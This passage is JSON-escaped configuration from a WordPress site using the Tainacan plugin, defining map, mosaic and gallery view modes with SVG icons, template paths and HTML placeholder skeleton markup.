#dbdbdb);float:left;margin-right:10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"margin-left: 74px; column-width: 200px;\"\u003E\u003Cdiv style=\"break-inside: avoid;width: 83%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 53%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 72%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 54%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"break-inside: avoid;width: 81%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/div\u003E\t\n\t\t\t\t\t\u003C/li\u003E\u003C/ul\u003E","requires_thumbnail":false},"map":{"label":"Map","description":"A map view, for displaying items that have geocoordinate metadata.","type":"component","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/themes/tainacan-interface/tainacan/view-mode-map.php","component":"view-mode-map","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\n\t\t\t\t\t\t\t\u003Ci\u003E\n\t\t\t\t\t\t\t\t\u003Csvg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 24 24\" fill=\"var(--tainacan-info-color, #505253)\" width=\"1.25em\" height=\"1.25em\"\u003E\n\t\t\t\t\t\t\t\t\t\u003Cpath d=\"M15,19L9,16.89V5L15,7.11M20.5,3C20.44,3 20.39,3 20.34,3L15,5.1L9,3L3.36,4.9C3.15,4.97 3,5.15 3,5.38V20.5A0.5,0.5 0 0,0 3.5,21C3.55,21 3.61,21 3.66,20.97L9,18.9L15,21L20.64,19.1C20.85,19 21,18.85 21,18.62V3.5A0.5,0.5 0 0,0 20.5,3Z\" /\u003E\n\t\t\t\t\t\t\t\t\u003C/svg\u003E\n\t\t\t\t\t\t\t\u003C/i\u003E\n\t\t\t\t\t\t\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":true,"implements_skeleton":true,"skeleton_template":"","placeholder_template":"\t\t\t\u003Cdiv style=\"display: flex; gap: 4px;\"\u003E\n\t\t\t\t\u003Cul style=\"float: inline-start;list-style: none;width: 180px; height: auto;display: flex;flex-direction:column;gap: 4px;margin:0px;padding: 0;\"\u003E\n\t\t\t\t\t\u003Cli style=\"height: 40px;background-color: var(--tainacan-block-gray1, #f2f2f2);display: flex;flex-direction:row;align-items: center;padding: 3px 6px;gap: 6px\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"min-width: 32px;height: 32px;background-color: var(--tainacan-block-gray2, #dbdbdb)\"\u003E\u003C/div\u003E\t\t\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 49%;height: 10px;background-color: var(--tainacan-block-gray3, #a5a5a5)\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: 40px;background-color: var(--tainacan-block-gray1, #f2f2f2);display: flex;flex-direction:row;align-items: center;padding: 3px 6px;gap: 6px\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"min-width: 32px;height: 32px;background-color: var(--tainacan-block-gray2, #dbdbdb)\"\u003E\u003C/div\u003E\t\t\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 68%;height: 10px;background-color: var(--tainacan-block-gray3, #a5a5a5)\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: 40px;background-color: var(--tainacan-block-gray1, #f2f2f2);display: flex;flex-direction:row;align-items: center;padding: 3px 6px;gap: 6px\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"min-width: 32px;height: 32px;background-color: var(--tainacan-block-gray2, #dbdbdb)\"\u003E\u003C/div\u003E\t\t\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 74%;height: 10px;background-color: var(--tainacan-block-gray3, #a5a5a5)\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: 40px;background-color: var(--tainacan-block-gray1, #f2f2f2);display: flex;flex-direction:row;align-items: center;padding: 3px 6px;gap: 6px\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"min-width: 32px;height: 32px;background-color: var(--tainacan-block-gray2, #dbdbdb)\"\u003E\u003C/div\u003E\t\t\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 71%;height: 10px;background-color: var(--tainacan-block-gray3, #a5a5a5)\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: 40px;background-color: var(--tainacan-block-gray1, #f2f2f2);display: flex;flex-direction:row;align-items: center;padding: 3px 6px;gap: 6px\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"min-width: 32px;height: 32px;background-color: var(--tainacan-block-gray2, #dbdbdb)\"\u003E\u003C/div\u003E\t\t\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 40%;height: 10px;background-color: var(--tainacan-block-gray3, #a5a5a5)\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"height: 40px;background-color: var(--tainacan-block-gray1, #f2f2f2);display: flex;flex-direction:row;align-items: center;padding: 3px 6px;gap: 6px\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"min-width: 32px;height: 32px;background-color: var(--tainacan-block-gray2, #dbdbdb)\"\u003E\u003C/div\u003E\t\t\n\t\t\t\t\t\t\t\t\u003Cdiv style=\"width: 59%;height: 10px;background-color: var(--tainacan-block-gray3, #a5a5a5)\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/li\u003E\t\t\t\t\u003C/ul\u003E\n\t\t\t\t\u003Cdiv style=\"width: calc(100% - 180px); height: auto;background-repeat: no-repeat;background-size: cover; background-color: var(--tainacan-block-gray1, #f2f2f2);background-image: url('data:image/svg+xml,%3Csvg%20width%3D%22803.301%22%20height%3D%22391.635%22%20viewBox%3D%220%200%20212.54%20103.62%22%20xml%3Aspace%3D%22preserve%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d%3D%22M-1.764%2048.512v19.154c1.643-3.092%2012.072%203.154%2010.543%204.4-2.274.13-10.2-1.377-6.518%202.47-4.975%202.865-3.496-.328-3.776-3.699-.125-.328-.173-.585-.25-.868v82.322h212.39V48.51H-1.764zm96.846.12c3.239%202.381%206.627%204.737%202.39%207.61-.123%203.148-.013%206.372-2.39%208.78-1.41%202.379-2.655%204.976-5.803%205.033-4.996-.803-4.05%206.176-8.377%205.357-6.435-3.166-2.866-13.901-9.489-15.79-7.714%203.195-1.378-9.275%203.455-8.514%206.733-.863%2013.475-1.655%2020.214-2.476m-32.926%201.892c3.351.21%2010.733-.612%204.808%203.871-7.285%204.64-2.894%208.74%202.653%2012.288%205.005%201.564%201.787%206.614-2.232%206-5.634%201.216-3.195-3.735-4.979-5.016-3.86.052.7%207.466-4.436%205.12-4.874-.83-5.39%206.603.628%206.05%204.48%206.915%204.413-.687%204.247-4.557%203.648.69%208.11.075%209.91%204.048%206.952%204.696-.63%207.087-4.817%209.589-.432%203.753-5.377%206.367-6.2%2010.142%201.538%205.38-3.581-2.222-7.154.038-2.67.478-4.12%205.98.138%205.671%204.84-2.911%202.436%206.369%207.09%205.704%205.958-2.69%2011.284.075%2014.644%202.59%203.614-.28%201.637%205.416%206.515%204.809%205.063%202.254%205.556%204.004%202.913%208.695-.234%203.194-3.913%204.846-5.614%207.384-3.384%204.52-9.925%207.976-9.675%2013.912-3.303%201.378%201.633%208.579-3.516%203.746-3.212-2.166-1.515-6.244-1.82-9.449-.684-5.575%205.617-13.963-1.204-16.566-2.566-4.201-2.454-9.471-2.277-13.005-4.47.502-5.255-4.622-10.158-4.957-3.732-3.626-8.605-3.759-11.169-8.23-1.54-2.41-3.953-4.564-4.951-7.131.614-3.08.368-6.336-2.6-8.125-3.426-.897-1.898-6.933-8.803-6.592-3.303-.098-6.136%202.724-9.246%203.82-3.904%202.261-3.947%201.71-.824-1.147%201.345-2.476-7.577-10.715-.62-13.204%203.54-2.395%207.91-.168%2011.866-.25%204.296.127%2011.682%201.935%2013.992.943-9.72-5.633%204.37-10.148%209.598-11.717%204.454-1.347%208.688-4.049%2013.294-4.473zm105.28%207.997c3.442-.211%2010.085%201.45%204.81%203.18-5.085%202.027.264%201.798%202.922%202.15l12.268%201.246c3.244-5.525%204.112.794%209.084.107%204.173%202.403%2011.066.24%2013.575%202.274%201.391%206.078-.485%209.82-6.983%208.917.577%204.614-5.54%2010.971-4.816%203.045%205.948-5.668-10.954-2.588-11.062%202.175%204.11-3.36%205.01%204.84%201.363%204.509-2.962%203.313-4.868%206.277-7.64%209.06-.915-6.945-4.9-.154-2.66%203.46-.09%203.552-7.653%203.665-8.056%206.873%204.34%203.952-3.2%205.42-4.218%202.404-.243%203.457%206.236%205.956.883%206.131%201.866%203.31%206.218%204.505%207.79%207.51-4.62.607-12.983-7.129-10.42-8.863.34-1.85-2.834-10.142-4.57-11.768-.971%203.62-5.74%205.006-5.438%208.75-6.681%201.08-3.625-12.508-12.141-9.987-3.004-.673-7.8-1.951-4.028%202.08%2010.37-1.547-2.863%2010.882-4.467%203.947-.707-3.348-7.323-12.563-5.17-4.36%201.583%203.895%204.176%209.357%209.223%207.656.658%201.726-4.62%206.84-5.866%209.642-.15%206.409-2.962%2014.724-9.85%2018.29l-.873-.072-1.166-.132v.001c-2.991-.089-2.415-4.738-3.872-6.787-3.377-3.939%201.386-8.048-2.084-11.556-.916-2.905-2.281-6.522-7.013-5.758-2.752.506-5.004-.321-6.753-2.497-2.791-1.61-.898-5.354-1.448-7.985%201.102-3.649%205.953-5.589%208.585-8.537%205.06-3.076%206.732%203.976%2011.149%202.59%202.733.683%2012.019-.296%208.762-2.806-2.107%205.425-5.946-6.487-4.25%201.957-2.54-.19-5.887-11.26-6.545-7.22%203.569%204.908-.306%205.332-2.602.75-4.135-2.31-9.814%2010.508-10.908%201.62-1.58-2.855%207.522.396%202.953-4.592%203.52-1.875%206.84-4.504%207.221-7.288%202.45%204.338%2013.631-3.1%2010.13-3.49-4.964%202.47-2.5-2.831-1.778-3.937-2.662-1.66-4.452%204.633-3.184%206.983-2.96%201.218-4.755-1.596-7.463-1.152%201.023-5.74%205.767-11.255%2011.87-11.6%203.072.937%2012.01.422%208.235%204.673-7.374-1.313.788%204.043%203.6-.984%202.81-2.97%2010.532.2%204.179-5.349%201.23-4.888%2014.848-7.176%205.76-2.917-5.767%202.158-2.659%205.274%201.585%206.69-.941-4.478%204.829-5.134%207.876-3.293%203.109-2.063%208-4.054%2012.266-5.53.317-.111.743-.18%201.235-.21M96.808%2070.07c2.75-.29%207.002%201.3%202.3%203.34-1.59%201.566-2.44%201.79-3.37-.477-1.69-1.838-.58-2.69%201.07-2.863m7.954%207.477c.227.004.543.08.971.245%204.089%202.577%202.672%207.226-.681%205.1l.235-.408.14-.242c.532-1.215-2.255-4.721-.665-4.695m-2.85%203.233c1.215-.065%203.695%202.36-.16%202.117-.683-1.543-.392-2.087.16-2.117m94.297%204.736c1.721.046%203.042%201.576-1.68%202.297l-.354-.043-.275-.238c.1-1.537%201.277-2.044%202.31-2.016m-66.763%201.2c-1.64%202.106-5.955-2.118-5.252%204.045l.225.021%201.116-.714c3.156-.564%209.618.31%203.912-3.352m9.244%201.057c-.196-.054-.513.389-1.032%201.632.438%201.26-.692%205.471%201.742%204.028-.61-.873-.12-5.5-.71-5.66m51.023.14c4.7.481%201.032%206.488-1.863%207.745-1.348.26-3.249%202.885-4.243%201.16.013-2.775%206.931-3.85%206.106-8.905m-45.983.034c-.848-.33-.386%204.161.804%201.15-.342-.741-.608-1.074-.804-1.15m-28.62%203.978c.5.184%201.143%201.324-.27%201.187-.277-1.062-.03-1.297.27-1.187M3.13%2097.235c1.365-.257%205.198%202.26.586%202.71l-.723-1.348c-.498-.882-.317-1.276.137-1.362m185.89.35c1.287.224%204.24%203.524%201.148%204.157-2.092-3.32-1.92-4.292-1.148-4.157M63.83%2099.233c.184-.398%202.735%202.403.858%201.712-.717-1.09-.919-1.579-.858-1.712m-55.066%201.183c3.11%201.207%206.283%202.622%209.074%201.357%202.408.905%203.908%206.157-.02%203.067-2.514-1.864-9.106.514-9.054-4.424m53.215%201.8c1.6.065%203.35.687%201.1%201.82l-1.29-.293c-2.856-1.098-1.409-1.59.19-1.526m4.634%201.869c1.163-.09%205.186%201.074%206.246%202.632-1.363.325-2.7-.64-3.99-.928-2.62-1.144-2.953-1.65-2.256-1.704m108.85%207.75c.286.056.534.255.715.636%202.679%201.666.062%207.232-2.755%205.52-3.822.034.04-6.554%202.04-6.157m4.422%202.958c1.276.065%202.188%202.773-1.726%203.695.063-2.821.96-3.734%201.726-3.695m5.842%201.23c.692.007%201.604.29%202.735.98%204.372-1.124%209.746%207.127%202.404%203.99l-1.816-.385c-5.213.525-6.325-4.616-3.323-4.585m-1.222%206.352c2.613%201.423%205.416%205.161%206.081.378%202.579%202.5%205.528%206.605%206.7%209.903-2.182%202.743-2.473%209.094-7.274%207.258-4.805-5.496-9.29-3.684-15.46-2.185%201.537-3.151-3.874-8.027%201.461-9.888zm-48.069%201.616c1.26-.083%201.886%201.021-.077%204.226-.787%201.494-.345%204.17-2.477%201.856-3.413-2.509.453-5.944%202.554-6.082m-108.29%202.545c1.497.247%204.66%203.669-.107%202.372-.91-1.94-.573-2.484.107-2.372m3.896%203.342c1.305-.114%204.702%201.97.433%201.923-1.187-1.365-1.026-1.871-.433-1.923m175.4%205.941c.744.047%203.773%204.482%201.845%207.23-1.395%201.334-2.445%204.431-4.818%203.485-1.774-3.385%202.518-5.057%204.054-7.489-1.286-2.362-1.42-3.247-1.081-3.226%22%20fill%3D%22%23dbdbdb%22%20style%3D%22-inkscape-stroke%3Anone%3Bpaint-order%3Astroke%20fill%20markers%22%20transform%3D%22translate(2.01%20-48.632)%22%2F%3E%3C%2Fsvg%3E');background-position: center;\"\u003E\u003C/div\u003E\n\t\t\t\u003C/div\u003E\n\t\t","requires_thumbnail":false},"mosaic":{"label":"Mosaico","description":"A mosaic view, similar to Flickr and Google Photos, which will display images without cropping.","type":"component","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/themes/tainacan-interface/tainacan/view-mode-mosaic.php","component":"view-mode-mosaic","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci class=\"tainacan-icon tainacan-icon-viewmasonry tainacan-icon-rotate-90 tainacan-icon-1-25em\"\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":false,"implements_skeleton":true,"skeleton_template":"","placeholder_template":"\u003Cul style=\"list-style: none;width: 100%; height: auto; display: flex; gap: 24px 0; flex-wrap: wrap;\"\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 112px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 130px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 121px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 124px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 110px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 128px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 147px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 102px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 147px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 99px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 138px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"flex-grow: 1; max-width: 35%; width: 116px; height: 120px ; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0; padding: 5px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 100%; background-color: var(--tainacan-block-gray2, #dbdbdb);margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100%;height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003C/ul\u003E","requires_thumbnail":true},"gallery":{"label":"Gallery","description":"A masonry view mode that displays two metadata and opens a slider lightbox.","type":"component","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/themes/tainacan-interface/tainacan/view-mode-gallery.php","component":"view-mode-gallery","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci\u003E\u003Csvg fill=\"var(--tainacan-info-color, #505253)\" xmlns=\"http://www.w3.org/2000/svg\" height=\"24\" width=\"24\"\u003E\u003Cpath d=\"M8.492 6.074h7.016v11.852H8.492zM4.943 7.477h2.806v9.046H4.943zM16.251 7.477h2.807v9.046H16.25zM19.8 8.442h1.884v7.116h-1.883zM2.316 8.442h1.883v7.116H2.316z\"/\u003E\u003C/svg\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":true,"implements_skeleton":true,"skeleton_template":"","placeholder_template":"\u003Cul style=\"list-style: none;width: 100%; height: auto; column-width: 220px; gap: 15px;padding: 0;\"\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 89%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 84%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 90%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 84%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 70%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 67%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 89%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003C/li\u003E\u003Cli style=\"break-inside: avoid; width: calc(100% - 40px); height: auto; background-color: var(--tainacan-block-gray1, #f2f2f2); margin: 0 0 15px 0; padding: 20px;\"\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 100%; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 0 0 8px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 42px; height: 54px; background-color: var(--tainacan-block-gray2, #dbdbdb);float: right;margin-left: 10px;margin-bottom: 10px;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 60%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 50%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003Cdiv style=\"width: 65%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 74%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 0;\"\u003E\u003C/div\u003E\u003Cdiv style=\"width: 92%; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5); margin: 14px 